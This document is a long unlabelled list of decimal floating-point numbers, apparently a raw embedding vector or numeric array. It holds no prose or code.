-0.045992642641067505, -0.016538823023438454, 0.0022291308268904686, 0.029099609702825546, 0.00544595904648304, 0.0008744528167881072, 0.005023633595556021, 0.006563079077750444, 0.00474775955080986, 0.018187256529927254, -0.014372700825333595, 0.017247240990400314, -0.01953597366809845, 0.03476694971323013, 0.012608468532562256, 0.002329603536054492, -0.03523014485836029, 0.04495726153254509, 0.015585184097290039, 0.0019805035553872585, -0.031088627874851227, 0.010047267191112041, -0.029862521216273308, -0.05424842983484268, -0.02340502291917801, -0.013167028315365314, 0.025693755596876144, -0.029617298394441605, 0.024208804592490196, -0.010524086654186249, -0.039480648934841156, -0.009652188047766685, 0.02803698368370533, -0.021075420081615448, 0.011069023050367832, 0.008603185415267944, -0.001126485993154347, 0.022560371086001396, -0.03141558915376663, -0.027887126430869102, -0.0014764373190701008, 0.008024189621210098, 0.01964496076107025, -0.004403768107295036, 0.006838953122496605, -0.016470706090331078, -0.0005879353848285973, -0.03770960494875908, -0.019290752708911896, -0.037409890443086624, 0.017560578882694244, 0.006542643997818232, -0.03790033236145973, 0.0489625446498394, -0.010612638667225838, 0.0006522208568640053, -0.06326712667942047, 0.03833628445863724, -0.01862320490181446, 0.009693058207631111, 0.040788497775793076, -0.041278939694166183, -0.0293448306620121, 0.016743173822760582, 0.020312508568167686, -0.014481687918305397, -0.02414068765938282, -0.006437062285840511, 0.004683047998696566, 0.017151877284049988, 0.017724059522151947, -0.010060890577733517, -0.027682773768901825, -0.02761465683579445, 0.018895672634243965, -0.01998554728925228, -0.04958922043442726, 0.03958963602781296, 0.020680340006947517, 0.019345246255397797, 0.012349623255431652, -0.016170991584658623, 0.0036204219795763493, 0.036837708204984665, -0.0007467333343811333, 0.005210955161601305, 0.014781402423977852, 0.012758325785398483, 0.01525822188705206, 0.0025850425008684397, -0.0390719473361969, -0.018132762983441353, -0.026933487504720688, -0.0054697999730706215, -0.02416793443262577, 0.03375881537795067, 0.02013540454208851, 0.0019209012389183044, -0.04035254940390587, -0.020053664222359657, -0.015421703457832336, -0.08075959235429764, 0.02061222307384014, 0.011280185543000698, 0.002821749309077859, 0.013575730845332146, 0.05277710035443306, 0.014072985388338566, 0.024917222559452057, 0.0017284704372286797, -0.028227711096405983, 0.0022172103635966778, -0.0049010226503014565, -0.006532426457852125, -0.023187048733234406, -0.018718568608164787, -0.012955865822732449, -0.025966225191950798, 0.01751970872282982, -0.0211571604013443, 0.023445893079042435, -0.010673943907022476, -0.05656440928578377, -0.00207246164791286, 0.010360605083405972, -0.0012780464021489024, 0.035502612590789795, 0.015653301030397415, 0.0025680132675915956, 0.009577259421348572, 0.030461950227618217, -0.010183501057326794, -0.0389629602432251, -0.0008889276650734246, -0.06479295343160629, -0.019031908363103867, 0.005323348566889763, -0.011314244009554386, -0.012036285363137722, -0.009822480380535126, -0.02314617857336998, -0.012819631025195122, 0.012404116801917553, -0.00989740900695324, 0.034848690032958984, 0.005895531736314297, 0.02314617857336998, -0.0007471590652130544, -0.024753740057349205, 0.03640175983309746, 0.0013291342183947563, 0.01880030892789364, -0.028881635516881943, 0.028472932055592537, 0.010176689364016056, 0.019290752708911896, -0.014018491841852665, 0.0019839094020426273, -0.031606316566467285, 0.02576187252998352, -0.024181557819247246, -0.006535832304507494, 0.04948023334145546, -0.04146966710686684, -0.022328773513436317, -0.0030805941205471754, -0.04446681961417198, 0.004247098695486784, -0.01403211522847414, -0.024181557819247246, -0.01865045167505741, -0.022982697933912277, -0.019317999482154846, 0.027764515951275826, 0.021674849092960358, -0.022287903353571892, -0.036238279193639755, -0.0011494754580780864, 0.05157823860645294, 0.02800973691046238, -0.018214503303170204, 0.018841179087758064, -0.017506085336208344, 0.0001920049689942971, 0.017042890191078186, -0.02286008559167385, 0.002990339184179902, 0.012349623255431652, 0.040161821991205215, -0.005078127142041922, 0.01273789070546627, -0.0030891087371855974, 0.001071140868589282, -0.025530274957418442, 0.0031282762065529823, -0.015912145376205444, 0.011872803792357445, -0.03307764604687691, -0.0035863632801920176, 0.0031844726763665676, 0.029208596795797348, 0.009148121811449528, -0.005960242822766304, -0.0005683517665602267, 0.01953597366809845, -0.03136109560728073, 0.007479253690689802, -0.007765345275402069, 0.003264510305598378, 0.002942657098174095, 0.012370058335363865, 0.01836436055600643, 0.00036676781019195914, 0.010088137350976467, -0.013269203715026379, -0.009018699638545513, -0.0006632899167016149, -0.005708209704607725, -0.020639469847083092, -0.012901372276246548, -0.0059738666750490665, 0.03836353123188019, -0.004740947391837835, -0.04435783252120018, -0.029208596795797348, 0.01561243087053299, 0.001837457763031125, 0.024576636031270027, 0.018078269436955452, -0.045284222811460495, 0.04961646720767021, -0.036783214658498764, -0.01370515301823616, -0.006253146566450596, -0.004512755665928125, 0.03972586989402771, -0.025148820132017136, -0.014631545171141624, 0.013112534768879414, -0.007547370623797178, -0.024154311046004295, 0.016511576250195503, -0.0011622473830357194, 0.0356115996837616, -0.0292358435690403, -0.030489197000861168, 0.01595301553606987, -0.016252731904387474, -0.016457082703709602, 0.03580232709646225, -0.038853973150253296, -0.010510463267564774, 0.024617506191134453, 0.05212317779660225, -0.02741030603647232, 0.0245357658714056, 0.012547163292765617, 0.008099119178950787, -0.0391264408826828, -0.016511576250195503, 0.01323514524847269, -0.0011017934884876013, -0.011021341197192669, -0.04174213483929634, -0.000509600795339793, 0.008133177645504475, -0.0011222285684198141, 0.047954414039850235, -0.013473555445671082, -0.01964496076107025, -0.0008484831778332591, 0.016511576250195503, 0.00026842381339520216, -0.025012586265802383, 0.031143121421337128, 0.016906654462218285, -0.025543898344039917, -0.016143744811415672, -0.003434802871197462, 0.005623063538223505, 0.034222014248371124, -0.01919538900256157, -0.017955657094717026, -0.00046277028741315007, -0.025094326585531235, -0.00008887147851055488, -0.021075420081615448, -0.00814680103212595, -0.01525822188705206, -0.011872803792357445, 0.03702843561768532, 0.058907635509967804, 0.008582750335335732, -0.025911731645464897, -0.0014508934691548347, -0.01836436055600643, -0.010673943907022476, 0.0243722852319479, 0.032478217035532, -0.01666143350303173, -0.005231390241533518, 0.00029886362608522177, -0.00698881084099412, -0.014018491841852665, 0.02155223861336708, -0.009359284304082394, -0.017982903867959976, -0.00911406334489584, 0.014141102321445942, 0.0229145810008049, -0.0017914787167683244, 0.001109456643462181, 0.031061381101608276, -0.011382360942661762, 0.000685427978169173, -0.022764721885323524, -0.05629194155335426, -0.004012094810605049, -0.015435326844453812, 0.019209012389183044, -0.02539404109120369, -0.03836353123188019, -0.020639469847083092, -0.019631337374448776, 0.013664282858371735, -0.01979481801390648, -0.03997109457850456, 0.005432335659861565, 0.004693265538662672, -0.03533913195133209, -0.022287903353571892, -0.010292488150298595, 0.022682981565594673, 0.0023687707725912333, 0.0005394020117819309, 0.007056927774101496, 0.017696812748908997, -0.018582334741950035, 0.027178708463907242, -0.007663169410079718, 0.008596373721957207, -0.026552030816674232, 0.012172519229352474, 0.003926948644220829, -0.028854388743638992, 0.006055606994777918, -0.002736602909862995, -0.006137347314506769, 0.02055772952735424, -0.01209759060293436, 0.009747551754117012, 0.018350737169384956, -0.03525739163160324, -0.01621186174452305, -0.03509391099214554, -0.01154584251344204, 0.0009178774198517203, -0.024522142484784126, 0.008099119178950787, -0.012227012775838375, 0.0089028999209404, 0.009372907690703869, -0.005319942720234394, 0.04809064790606499, 0.006144159007817507, -0.009032323025166988, 0.022846462205052376, 0.03125210851430893, 0.028527425602078438, 0.016239108517766, 0.016729550436139107, 0.030352963134646416, 0.013405438512563705, -0.02502620965242386, 0.007663169410079718, -0.006573296617716551, -0.015585184097290039, -0.029154103249311447, -0.013276015408337116, 0.006801488809287548, 0.012063532136380672, 0.0070433043874800205, -0.008071872405707836, -0.0018323489930480719, 0.011784251779317856, -0.00820129457861185, -0.04375839978456497, 0.01603475585579872, 0.007710851728916168, -0.02675638161599636, 0.011178010143339634, -0.027873503044247627, -0.012444987893104553, 0.003528463887050748, -0.024889975786209106, -0.025353170931339264, 0.034331001341342926, -0.01461792178452015, -0.015176481567323208, -0.0014747343957424164, -0.007118233013898134, 0.01822812668979168, 0.01039466354995966, -0.0359930545091629, -0.0013333915267139673, 0.021770212799310684, 0.0030295064207166433, -0.03915368765592575, -0.03130660206079483, 0.03245097026228905, 0.007377077825367451, 0.0038962960243225098, -0.03313213959336281, 0.002312574302777648, -0.018241750076413155, 0.013364567421376705, -0.023949960246682167, 0.017356228083372116, 0.0036987564526498318, 0.03070717304944992, -0.03326837345957756, 0.011436854489147663, -0.02249225415289402, 0.014563428238034248, 0.00668909540399909, -0.00848738569766283, 0.0055447290651500225, 0.006607355084270239, 0.007050116080790758, 0.021661225706338882, -0.027369435876607895, -0.02027163840830326, -0.024290544912219048, 0.004304998554289341, 0.013698341324925423, -0.0356660932302475, -0.003528463887050748, -0.016470706090331078, 0.02354125678539276, -0.008037813939154148, 0.008732607588171959, 0.01736985146999359, -0.024099817499518394, 0.030897900462150574, -0.008691737428307533, 0.004427609033882618, -0.06272219121456146, 0.047872673720121384, -0.020339755341410637, -0.007976507768034935, 0.0031453054398298264, -0.007186350412666798, 0.04002558812499046, -0.003508028807118535, -0.007056927774101496, 0.02641579695045948, 0.03640175983309746, -0.031088627874851227, -0.003417773637920618, 0.0025833395775407553, -0.05749080330133438, -0.02877264842391014, 0.01397762168198824, 0.0008991452632471919, 0.04833586886525154, 0.004648989532142878, 0.01592576876282692, -0.002891569398343563, 0.05005241930484772, 0.005629875231534243, -0.0008655124111101031, 0.011375549249351025, 0.009740740060806274, 0.0032900541555136442, 0.0009953605476766825, -0.012335999868810177, 0.016048379242420197, 0.04027080908417702, -0.02562563866376877, -0.01896378956735134, 0.002222319133579731, 0.040052834898233414, -0.005619657691568136, 0.01113032829016447, 0.0163480956107378, -0.010026832111179829, -0.014604298397898674, -0.03506666421890259, -0.0012984814820811152, 0.011280185543000698, 0.0229145810008049, -0.008242164738476276, -0.0029222220182418823, -0.025612015277147293, 0.05329478904604912, -0.010340170003473759, 0.013991245068609715, -0.0000918516016099602, -0.02112991362810135, 0.0005215212586335838, -0.012724267318844795, -0.007840273901820183, -0.005064503755420446, -0.0048294998705387115, -0.011784251779317856, 0.015585184097290039, 0.03607479855418205, 0.01705651357769966, 0.0292903371155262, -0.05411219596862793, -0.0010813584085553885, -0.01154584251344204, -0.008896088227629662, 0.022451383993029594, -0.020884690806269646, 0.013657471165060997, 0.004379927180707455, 0.02508070319890976, -0.008501009084284306, -0.008650867268443108, -0.008330716751515865, 0.0064574978314340115, 0.01802377589046955, 0.026688264682888985, -0.009720304980874062, -0.012969489209353924, -0.04384014382958412, -0.009577259421348572, 0.0015224163653329015, -0.029099609702825546, 0.022301526740193367, 0.010585391893982887, 0.00902551133185625, 0.004495725966989994, 0.027478422969579697, -0.022219786420464516, 0.019999170675873756, -0.025857238098978996, -0.021797459572553635, -0.005548134911805391, 0.0005304616061039269, 0.017873916774988174, -0.02508070319890976, 0.00010111126903211698, -0.024576636031270027, 0.020966432988643646, -0.012342811562120914, -0.00020647984638344496, -0.002838778542354703, 0.012288318015635014, 0.0032900541555136442, 0.002498193411156535, -0.044058118015527725, 0.0005142838344909251, -0.04498450830578804, -0.02129339426755905, -0.0015786129515618086, -0.012145272456109524, -0.028990622609853745, -0.01728811115026474, -0.012261071242392063, 0.008739419281482697, 0.02286008559167385, 0.05261361971497536, 0.02369111403822899, 0.03201501816511154, -0.02337777614593506, -0.018146386370062828, -0.0018732192693278193, -0.06735415011644363, 0.0035727398935705423, -0.03384055569767952, -0.01268339715898037, 0.026347680017352104, 0.026770005002617836, -0.013160216622054577, 0.03634726628661156, -0.007826650515198708, 0.013017171062529087, -0.0097816102206707, 0.00149091228377074, 0.00013155107444617897, 0.01825537346303463, 0.021061796694993973, -0.016756797209382057, -0.004955516196787357, -0.024018077179789543, -0.007574617397040129, -0.009556824341416359, -0.0024896785616874695, -0.017751306295394897, -0.012431364506483078, 0.006321263499557972, -0.03800932317972183, -0.025571145117282867, -0.015217351727187634, -0.02795524336397648, 0.029699040576815605, -0.03893571346998215, -0.026374926790595055, 0.03193327784538269, 0.03179704397916794, -0.01528546866029501, -0.03523014485836029, 0.0007331098895519972, -0.02029888518154621, -0.02408619411289692, -0.02087106741964817, -0.00008461416291538626, -0.020421495661139488, 0.0021984782069921494, -0.0228328388184309, -0.015789534896612167, -0.03217850252985954, -0.008746230974793434, 0.01990380510687828, 0.01535358652472496, 0.005187114235013723, -0.016593316569924355, 0.013385002501308918, 0.0022802187595516443, -0.04223258048295975, 0.010088137350976467, 0.006883229129016399, -0.00161011703312397, -0.007949260994791985, -0.009488706476986408, 0.0011332976864650846, 0.021593108773231506, -0.03476694971323013, -0.009386531077325344, -0.004666018765419722, -0.006961564067751169, 0.015435326844453812, -0.0050270394422113895, 0.0021780431270599365, -0.019781194627285004, 0.0072749024257063866, 0.007452006917446852, 0.014522558078169823, 0.015571560710668564, 0.018296243622899055, 0.038227297365665436, -0.018759438768029213, 0.034848690032958984, 0.04348593205213547, -0.005500453058630228, 0.02999875508248806, 0.012322376482188702, 0.0006517951260320842, -0.003623827826231718, 0.0194542333483696, 0.007247655652463436, 0.01022437121719122, -0.021633978933095932, -0.012778760865330696, 0.01080336607992649, -0.023187048733234406, -0.007377077825367451, -0.00846013892441988, 0.0008131474605761468, 0.003451832104474306, 0.03215125575661659, -0.019917428493499756, -0.010176689364016056, 0.006222493946552277, 0.01438632421195507, 0.028472932055592537, -0.030461950227618217, -0.01431820634752512, 0.03400403633713722, 0.0453932099044323, -0.015707794576883316, 0.0010336764389649034, 0.03991660103201866, 0.010210747830569744, -0.025911731645464897, 0.026715511456131935, -0.0005768663831986487, 0.015830405056476593, 0.020625846460461617, 0.011648017913103104, -0.006610760930925608, 0.03209675848484039, 0.020939186215400696, -0.0011494754580780864, -0.01429095957428217, 0.01027886476367712, -0.0027689586859196424, 0.0017267675139009953, -0.03149732947349548, 0.019399739801883698, -0.008453327231109142, -0.023636620491743088, 0.007710851728916168, 0.04174213483929634, 0.015394456684589386, -0.036837708204984665, -0.014195595867931843, 0.01655244641005993, 0.01720637083053589, 0.025462158024311066, 0.0146451685577631, -0.009550012648105621, -0.017111007124185562, 0.03702843561768532, -0.0024266703985631466, 0.03661973401904106, -0.025802744552493095, 0.02029888518154621, -0.013276015408337116, 0.007778968662023544, -0.025285053998231888, 0.007724475115537643, 0.026878993958234787, 0.0035523048136383295, -0.028254957869648933, -0.02215166948735714, -0.010408286936581135, -0.00820129457861185, -0.014985754154622555, 0.006539238151162863, 0.0032576986122876406, 0.0037668736185878515, -0.004379927180707455, 0.02322791889309883, 0.009039134718477726, -0.013058041222393513, -0.026592900976538658, 0.004815876483917236, -0.010898729786276817, -0.006065824534744024, -0.013371379114687443, 0.04062501713633537, -0.021225277334451675, 0.003947383724153042, -0.0044514499604702, 0.02380010113120079, 0.01799652725458145, -0.03245097026228905, 0.009441024623811245, -0.017710436135530472, 0.010885106399655342, -0.016307225450873375, -0.003409259021282196, -0.0292903371155262, 0.006842358969151974, 0.005663933698087931, -0.015013000927865505, 0.0019600684754550457, -0.025325924158096313, -0.015081117860972881, 0.07618212699890137, 0.004192605149000883, -0.012819631025195122, -0.008024189621210098, 0.022315150126814842, -0.007234032265841961, -0.010496839880943298, -0.004141517449170351, 0.012628903612494469, -0.002309168456122279, 0.020108157768845558, -0.00898464024066925, -0.015762288123369217, 0.01825537346303463, 0.001392142497934401, 0.007867520675063133, -0.000800801208242774, -0.02345951646566391, -0.0018664075760170817, 0.016811290755867958, -0.01124612707644701, 0.01830986700952053, 0.01825537346303463, 0.003371794708073139, 0.004591090139001608, -0.010966847650706768, -0.01728811115026474, 0.004216446075588465, -0.023582126945257187, 0.00009360774856759235, 0.019372493028640747, 0.01856871135532856, -0.02374560758471489, -0.007002434227615595, -0.01091916486620903, 0.001863001729361713, -0.002341523999348283, 0.01959046721458435, 0.008085495792329311, -0.018759438768029213, 0.021116290241479874, -0.007227220572531223, -0.0023159801494330168, -0.02013540454208851, -0.0011384064564481378, 0.0038009320851415396, 0.029699040576815605, -0.016279978677630424, -0.021089043468236923, 0.008609997108578682, -0.004192605149000883, -0.018704945221543312, 0.01893654279410839, 0.007138668093830347, -0.021225277334451675, -0.017097383737564087, 0.012404116801917553, 0.0025288460310548544, 0.00005816558768856339, -0.03757337108254433, 0.009876973927021027, -0.0008340082713402808, -0.03694669529795647, 0.013555295765399933, -0.0030686736572533846, 0.027423929423093796, -0.006873011589050293, -0.011872803792357445, 0.006719748489558697, 0.021933695301413536, 0.024671999737620354, 0.002266595372930169, -0.004587684292346239, -0.0014832490123808384, 0.032260242849588394, -0.003841802477836609, -0.01177062839269638, 0.008582750335335732, -0.01535358652472496, 0.004509349819272757, 0.009461459703743458, 0.00466942461207509, 0.002077570417895913, 0.013017171062529087, -0.01930437609553337, -0.0006735074566677213, -0.014372700825333595, -0.026715511456131935, -0.004519567359238863, -0.007390701211988926, 0.0014185378095135093, 0.00801737792789936, 0.03533913195133209, 0.011368737556040287, 0.003661292139440775, -0.011736569926142693, 0.017846670001745224, 0.004444638267159462, -0.013330508954823017, -0.005779732950031757, 0.0022989509161561728, 0.012635715305805206, 0.008248976431787014, -0.022356020286679268, -0.02141600474715233, 0.023391399532556534, -0.0014015085762366652, -0.012690208852291107, -0.008405645377933979, -0.001117971260100603, -0.003998471423983574, 0.00011154168896609917, -0.0040052831172943115, -0.04108821228146553, -0.003606798592954874, -0.03206951171159744, 0.0020843821112066507, 0.0027655528392642736, -0.0066482252441346645, -0.01201585028320551, -0.0037498443853110075, -0.008868841454386711, 0.02615695260465145, -0.005415306426584721, -0.0065801083110272884, -0.0007348128128796816, -0.005657122004777193, 0.007928825914859772, 0.0033377360086888075, -0.021674849092960358, 0.010680755600333214, 0.011804686859250069, 0.0055617582984268665, -0.019699454307556152, 0.019685830920934677, -0.00089488789672032, 0.031115874648094177, 0.009699869900941849, -0.012955865822732449, -0.007213597185909748, -0.0029239249415695667, 0.02505345642566681, 0.011661641299724579, 0.009475083090364933, 0.011634394526481628, -0.005534511525183916, -0.02129339426755905, -0.004076806362718344, -0.01600750908255577, 0.010735249146819115, 0.012771949172019958, -0.05228665843605995, -0.0019549597054719925, 0.006385974586009979, -0.014250089414417744, 0.006787865422666073, 0.011668452993035316, 0.004148329142481089, 0.009536389261484146, 0.01608925126492977, -0.007533747237175703, 0.034821443259716034, 0.028200464323163033, -0.010953224264085293, -0.000698199903126806, 0.021116290241479874, 0.021770212799310684, -0.02746479958295822, 0.004815876483917236, 0.001426200964488089, 0.0035829574335366488, 0.02345951646566391, -0.015830405056476593, -0.004836311563849449, 0.021702095866203308, 0.006995622534304857, -0.00958407111465931, 0.010333358310163021, 0.021402381360530853, -0.02189282327890396, -0.008412457071244717, 0.00022478631581179798, -0.04359491914510727, -0.019358869642019272, 0.011402796022593975, -0.008800724521279335, -0.0006202909862622619, -0.0005257785669527948, -0.04304998368024826, 0.017124630510807037, -0.007922014221549034, 0.050570107996463776, -0.01697477139532566, -0.017424345016479492, 0.031551823019981384, -0.04356767237186432, -0.0020401061046868563, -0.0021473905071616173, -0.008385210298001766, -0.02565288543701172, 0.014808649197220802, 0.0077585335820913315, 0.01400486845523119, -0.013963998295366764, -0.0011401093797758222, -0.022628488019108772, -0.005108779761940241, 0.02089831419289112, 0.013664282858371735, 0.013963998295366764, -0.0106058269739151, 0.023473139852285385, 0.01218614261597395, -0.019713077694177628, 0.007833462208509445, -0.0005172639503143728, 0.018187256529927254, -0.011334679089486599, -0.006835547275841236, -0.03138834238052368, -0.00040274212369695306, -0.002026482718065381, -0.016756797209382057, 0.0031078411266207695, -0.012846877798438072, 0.011511784046888351, 0.026483913883566856, -0.026606524363160133, -0.0075269355438649654, 0.013453120365738869, -0.01467241533100605, -0.002142281737178564, -0.012315564788877964, -0.006529020611196756, -0.0026923269033432007, -0.0031793639063835144, -0.0021473905071616173, 0.004638771992176771, 0.017451591789722443, -0.025612015277147293, 0.01429095957428217, -0.0036136102862656116, -0.012390493415296078, -0.014522558078169823, -0.018119139596819878, -0.0002089277986669913, 0.008364775218069553, 0.009740740060806274, -0.0007522678351961076, -0.00914131011813879, -0.0057422686368227005, -0.002607180504128337, 0.013344132341444492, -0.02076208032667637, -0.008541880175471306, 0.0029137074016034603, -0.005994301754981279, -0.014086608774960041, -0.0010634775971993804, -0.007097797933965921, 0.01121888030320406, -0.02286008559167385, -0.006859388202428818, -0.0034330999478697777, -0.01207034382969141, 0.026878993958234787, -0.008296658284962177, 0.016198238357901573, 0.006280393339693546, 0.01008132565766573, 0.026402173563838005, 0.02465837635099888, 0.00916855689138174, 0.0031844726763665676, -0.0164025891572237, -0.005030445288866758, 0.017165500670671463, -0.008412457071244717, -0.016879407688975334, 0.0001441101630916819, -0.013691529631614685, 0.0457201711833477, -0.00884159468114376, -0.026456667110323906, -0.029889767989516258, -0.02411344088613987, -0.011709323152899742, -0.00470007723197341, 0.022356020286679268, -0.03283242508769035, -0.014250089414417744, -0.000010210907021246385, 0.009475083090364933, -0.02311893180012703, 0.016756797209382057, 0.012458611279726028, -0.011702511459589005, 0.004240287002176046, -0.0023398210760205984, -0.02186557650566101, 0.0012797493254765868, 0.015653301030397415, 0.005803573876619339, -0.023650243878364563, -0.021279770880937576, 0.006784459576010704, 0.006426844745874405, -0.017383474856615067, -0.02243776060640812, -0.03144283592700958, 0.006426844745874405, -0.0051496499218046665, -0.022764721885323524, -0.007996942847967148, -0.00007684456068091094, 0.0008625322952866554, -0.014563428238034248, 0.01595301553606987, 0.0097816102206707, 0.0011835339246317744, -0.0089573934674263, 0.0006726559950038791, -0.007022869307547808, 0.00047383931814692914, -0.020121781155467033, -0.0022206162102520466, -0.008971016854047775, -0.008753042668104172, -0.011157575063407421, 0.02468562312424183, 0.02502620965242386, 0.007002434227615595, 0.03830903768539429, -0.006569890771061182, -0.00765635771676898, -0.024726493284106255, 0.02450851909816265, -0.0031044352799654007, 0.0009425698663108051, 0.0008033555932343006, -0.014454441145062447, 0.03384055569767952, -0.007867520675063133, -0.008718984201550484, 0.016143744811415672, -0.010340170003473759, 0.0179147869348526, 0.02147049829363823, -0.01657969318330288, -0.0021695285104215145, -0.010885106399655342, -0.003906513564288616, 0.002026482718065381, 0.016497952863574028, 0.002702544443309307, 0.019372493028640747, -0.008405645377933979, 0.01592576876282692, 0.011436854489147663, -0.03147008270025253, -0.04945298656821251, -0.005459582433104515, -0.022819215431809425, 0.0055617582984268665, -0.03185153752565384, -0.04040704295039177, -0.008051437325775623, -0.010823801159858704, 0.012642526999115944, -0.010564956814050674, -0.010346981696784496, -0.016647810116410255, 0.0024505113251507282, -0.005221172701567411, -0.030788913369178772, 0.026225069537758827, 0.014577051624655724, -0.03449448198080063, -0.011137139983475208, 0.0009740740060806274, 0.011532219126820564, 0.009604506194591522, -0.005868284963071346, 0.001211632275953889, -0.01063307374715805, -0.007881144061684608, -0.01893654279410839, 0.013058041222393513, -0.03664698079228401, -0.0002594834368210286, 0.017015641555190086, 0.013909504748880863, 0.010244806297123432, 0.015326338820159435, -0.0025033021811395884, 0.01901828497648239, 0.03645625337958336, -0.01301035936921835, -0.02206992916762829, 0.01373239979147911, -0.002784284995868802, -0.01502662431448698, -0.0015990480314940214, 0.01979481801390648, 0.00610669469460845, 0.03215125575661659, -0.019467856734991074, -0.013357755728065968, 0.0029358454048633575, -0.003126573283225298, 0.004291375167667866, 0.0009919547010213137, 0.0018170226830989122, -0.03076166659593582, 0.003967818804085255, -0.008507820777595043, -0.010265241377055645, 0.014522558078169823, 0.034957677125930786, 0.012560786679387093, 0.021225277334451675, -0.011995415203273296, 0.006566484924405813, -0.031061381101608276, 0.004587684292346239, -0.0211026668548584, -0.018773062154650688, -0.01348036713898182, -0.01528546866029501, 0.0016722738509997725, -0.02780538611114025, 0.01987655833363533, 0.008562315255403519, 0.009406966157257557, -0.034331001341342926, 0.018105516210198402, 0.0025339548010379076, -0.001811913913115859, -0.012390493415296078, -0.00580016802996397, 0.009120875038206577, -0.012172519229352474, 0.012601656839251518, -0.002309168456122279, 0.008248976431787014, -0.01091916486620903, -0.0029324395582079887, 0.010851047933101654, -0.020639469847083092, -0.021770212799310684, 0.00846013892441988, 0.009590882807970047, 0.005987490061670542, 0.018555087968707085, -0.013269203715026379, -0.0025373606476932764, 0.021075420081615448, -0.0009928061626851559, -0.013698341324925423, 0.016143744811415672, 0.015203728340566158, -0.017955657094717026, 0.0003365408629179001, -0.02098005637526512, 0.019495103508234024, -0.0029920421075075865, 0.009468271397054195, -0.023037191480398178, -0.011675264686346054, -0.0005504710134118795, 0.01301035936921835, 0.011137139983475208, 0.002334712306037545, 0.008078684099018574, 0.004431014880537987, -0.013310073874890804, 0.007615487556904554, -0.014018491841852665, 0.005210955161601305, -0.0016297007678076625, 0.011382360942661762, 0.021797459572553635, -0.015735041350126266, -0.008364775218069553, -0.004066588822752237, 0.012254259549081326, 0.003032912267372012, -0.01461792178452015, -0.004689859692007303, -0.001743796863593161, -0.005500453058630228, -0.010885106399655342, -0.022601241245865822, 0.00834434013813734, 0.014590675011277199, -0.012608468532562256, 0.013119346462190151, 0.046047136187553406, -0.005585599225014448, 0.0164025891572237, 0.0004947001580148935, -0.00026672089006751776, -0.011539030820131302, 0.006256552413105965, -0.0021865577436983585, -0.007887955754995346, -0.0068117063492536545, -0.0036306395195424557, 0.00851463247090578, -0.001477288780733943, -0.005268855020403862, -0.01882755570113659, 0.014904013834893703, 0.005384653806686401, -0.010244806297123432, 0.013098911382257938, -0.0035829574335366488, 0.01301035936921835, -0.012840066105127335, -0.013459932059049606, 0.012104402296245098, 0.015530690550804138, -0.003007368417456746, -0.009604506194591522, -0.03381330892443657, 0.007424760144203901, 0.001066883560270071, 0.005517482291907072, 0.004465073347091675, -0.007976507768034935, 0.010619450360536575, -0.0016501358477398753, -0.009686246514320374, -0.011818310245871544, 0.02476736344397068, 0.008732607588171959, 0.01799652725458145, -0.015462573617696762, 0.003044832730665803, -0.01899103820323944, -0.0035318697337061167, -0.008071872405707836, 0.008031001314520836, 0.00748606538400054, 0.0010226074373349547, -0.007922014221549034, -0.004192605149000883, -0.016566069796681404, -0.01794203370809555, -0.00113925791811198, -0.013602977618575096, 0.0016722738509997725, -0.017696812748908997, 0.0042947810143232346, 0.008466950617730618, 0.008998263627290726, -0.03062543086707592, 0.007383889518678188, 0.009073193185031414, 0.0022240220569074154, 0.0016671650810167193, -0.003058456117287278, 0.009236673824489117, 0.007022869307547808, -0.01572141796350479, -0.00793563760817051, -0.0008186819613911211, 0.010033643804490566, 0.00980885699391365, -0.003065267810598016, 0.014795025810599327, -0.011613959446549416, -0.005476612132042646, 0.008623620495200157, -0.008337528444826603, -0.005020227748900652, 0.011838745325803757, -0.02050323598086834, -0.005534511525183916, 0.0036476687528192997, 0.006658442784100771, 0.016279978677630424, -0.030925147235393524, -0.008439703844487667, -0.023350529372692108, -0.03122486174106598, -0.0009604506194591522, 0.003947383724153042, -0.010203936137259007, -0.026906240731477737, 0.00020030673476867378, 0.0016126715345308185, -0.015653301030397415, -0.000053216455853544176, 0.005691180471330881, 0.003777091158553958, -0.0019038718892261386, -0.019045531749725342, -0.018636828288435936, 0.02772364392876625, 0.006855982355773449, 0.023323282599449158, 0.0027740674559026957, 0.004553625825792551, -0.022247033193707466, 0.014018491841852665, -0.002925627864897251, -0.010265241377055645, 0.000022590385924559087, -0.006760618649423122, 0.009515954181551933, -0.002625912893563509, -0.0024147499352693558, 0.019372493028640747, 0.007778968662023544, 0.01666143350303173, 0.0007241695420816541, 0.0007514163735322654, -0.0328051783144474, -0.002111628884449601, 0.028472932055592537, 0.003482484957203269, -0.014508934691548347, -0.0024522142484784126, -0.000002857058461813722, 0.005612845998257399, -0.012615280225872993, -0.0024181557819247246, 0.005970460828393698, -0.01683853752911091, 0.005064503755420446, 0.005691180471330881, 0.0018612988060340285, 0.010244806297123432, -0.01254035159945488, 0.02869090624153614, -0.013923128135502338, -0.00047085920232348144, -0.0035727398935705423, 0.012390493415296078, -0.0004363749467302114, -0.03067992627620697, -0.0019209012389183044, -0.003841802477836609, -0.016198238357901573, 0.002329603536054492, 0.0328051783144474, -0.009706681594252586, 0.022274279966950417, 0.019672207534313202, -0.0022887333761900663, 0.01731535792350769, 0.0043663037940859795, 0.007520123850554228, -0.022982697933912277, -0.01365065947175026, 0.006437062285840511, 0.006702719256281853, -0.0008105930755846202, 0.0015556234866380692, 0.00893014669418335, 0.025325924158096313, -0.024930845946073532, 0.006188435014337301, -0.002860916778445244, 0.012662962079048157, 0.007860708981752396, 0.021361511200666428, 0.013344132341444492, 0.014086608774960041, 0.005967054981738329, 0.005789950489997864, -0.007445195224136114, 0.005064503755420446, 0.0022172103635966778, -0.012036285363137722, 0.00007673812797293067, -0.004781818017363548, 0.006403003819286823, 0.0002677852171473205, -0.014713285490870476, 0.018841179087758064, 0.005214361008256674, -0.01817363314330578, -0.006069230381399393, -0.009461459703743458, 0.00549364136531949, 0.004407173953950405, 0.02356850355863571, -0.0041687642224133015, -0.011539030820131302, 0.014372700825333595, 0.008153612725436687, 0.005735456943511963, -0.018868425861001015, -0.021279770880937576, -0.0030465356539934874, 0.0076699815690517426, -0.002247862983494997, 0.013923128135502338, 0.0017778553301468492, -0.004723918158560991, -0.006035171914845705, 0.0071318564005196095, -0.0031589288264513016, 0.009502330794930458, -0.004546814132481813, -0.004069994669407606, 0.024917222559452057, -0.0039541954174637794, 0.010197124443948269, 0.0014849519357085228, -0.0010694379452615976, -0.017124630510807037, -0.004815876483917236, 0.008133177645504475, 0.0019294158555567265, 0.016852160915732384, 0.009686246514320374, 0.0028711343184113503, -0.02562563866376877, 0.011184821836650372, 0.025203313678503036, -0.00911406334489584, -0.0024590259417891502, 